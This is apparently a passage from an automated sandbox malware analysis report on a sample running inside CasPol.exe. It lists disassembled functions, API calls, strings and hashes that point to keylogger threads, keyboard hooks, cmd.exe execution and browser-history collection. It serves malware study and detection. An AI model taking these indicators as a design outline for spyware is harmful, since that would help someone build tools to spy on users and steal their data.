                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                  • Opcode ID: f219f81f2db817a89c88b3221649508d6ef427ce8f5576a44e3a57a9eb601318
                                                                                                                                                                                                                                  • Instruction ID: 5dc71b71bde44702d26a4cbc12f9298653d6fc4ab722c143c4ed6f2fd59d79f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f219f81f2db817a89c88b3221649508d6ef427ce8f5576a44e3a57a9eb601318
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C31BC763053058BAB24CF5CF88095BB3E9FF857913120A3EE546C7619DB31E91487A9
                                                                                                                                                                                                                                  Function 10003FF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 100040D8
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 100040E2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                  • Opcode ID: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                  • Instruction ID: dceabf25fecf4d0f8060b32b9c351c32afdfa4cc9e92bfec45e796551365fa88
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9431D4B6700700CFE724CF5CE880B5BB3E5EF90691B120A2EF652C7649CB72E95087A5
                                                                                                                                                                                                                                  Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                                                  • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                                                                  • API String ID: 368326130-2663660666
                                                                                                                                                                                                                                  • Opcode ID: b5b89a640bfa1adf5683e19deea28c7ebbf09eb89aff2571d37a400ae519e83d
                                                                                                                                                                                                                                  • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5b89a640bfa1adf5683e19deea28c7ebbf09eb89aff2571d37a400ae519e83d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                                                                                                                                                  Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                                                                  • String ID: Offline Keylogger Started
                                                                                                                                                                                                                                  • API String ID: 465354869-4114347211
                                                                                                                                                                                                                                  • Opcode ID: cffe7025e60aab6a3ffef4224033cbf11d2f47926481c563762bff788649531d
                                                                                                                                                                                                                                  • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cffe7025e60aab6a3ffef4224033cbf11d2f47926481c563762bff788649531d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                                                                                                                                                  Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                                                                  • String ID: Online Keylogger Started
                                                                                                                                                                                                                                  • API String ID: 112202259-1258561607
                                                                                                                                                                                                                                  • Opcode ID: ebc7d9610d6ab2329214a039798506b69cb5e3a98029e04fea28ce607b08f990
                                                                                                                                                                                                                                  • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebc7d9610d6ab2329214a039798506b69cb5e3a98029e04fea28ce607b08f990
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                                                                                                  Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                  • String ID: `@
                                                                                                                                                                                                                                  • API String ID: 2583163307-951712118
                                                                                                                                                                                                                                  • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                  • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                                                                                                                                                  Function 1000A2F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A308
                                                                                                                                                                                                                                    • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 282849329-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                  • Instruction ID: 3b0e7b0924b02afa82a32a789def5d0431f475eb5fa42c660e1d048d1314c2f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C01191342087409BF732CF188881B0A77F1EF43680F614B5CF4D65B28ACB72B6848762
                                                                                                                                                                                                                                  Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                                                  • String ID: Connection Timeout
                                                                                                                                                                                                                                  • API String ID: 2055531096-499159329
                                                                                                                                                                                                                                  • Opcode ID: efb28abd4f03fcd2daed88ec778dc0db1ac548632f8822b136dfc55cfdaa85b0
                                                                                                                                                                                                                                  • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efb28abd4f03fcd2daed88ec778dc0db1ac548632f8822b136dfc55cfdaa85b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                                                                                                                                                  Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                                                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                                                                                                                                    • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                                                                                                                                                  • Opcode ID: bd0a6a6dae6415356e731995008518494c413937943f369f1725fb776b78fea2
                                                                                                                                                                                                                                  • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0a6a6dae6415356e731995008518494c413937943f369f1725fb776b78fea2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                                                                                                                                  Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                                                                                                                                                  • API String ID: 587946157-3896048727
                                                                                                                                                                                                                                  • Opcode ID: efd00babb5e2daa966760ac71b8731e5bc1663ddc7a4c5048c359fb97f21c829
                                                                                                                                                                                                                                  • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efd00babb5e2daa966760ac71b8731e5bc1663ddc7a4c5048c359fb97f21c829
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                                                                  Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                                                  • API String ID: 3123878439-4028850238
                                                                                                                                                                                                                                  • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                  • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                                                                                                  Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                                                                                                                                                  • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                                                                                                  • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                                                                                                                                  Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                                                                                                                                  • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04a0325834f843994ade633b459a1d3cb356a39676a395bc181b674f0ba6452b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                                                                                                                                  Function 10017B72 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 5b6d60a7e950da7f05ea47b616e82c5f5aeb43730b0ef79f46640cbcda0275c7
                                                                                                                                                                                                                                  • Instruction ID: e79e6140dbdac80e9811d453051d084bfb344763f1955d97d793d42e1ffb776b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b6d60a7e950da7f05ea47b616e82c5f5aeb43730b0ef79f46640cbcda0275c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBA1237690028A9FE716CE28C8917AABBF5FF15290F1541ADE9899F282C234DDC1C790
                                                                                                                                                                                                                                  Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
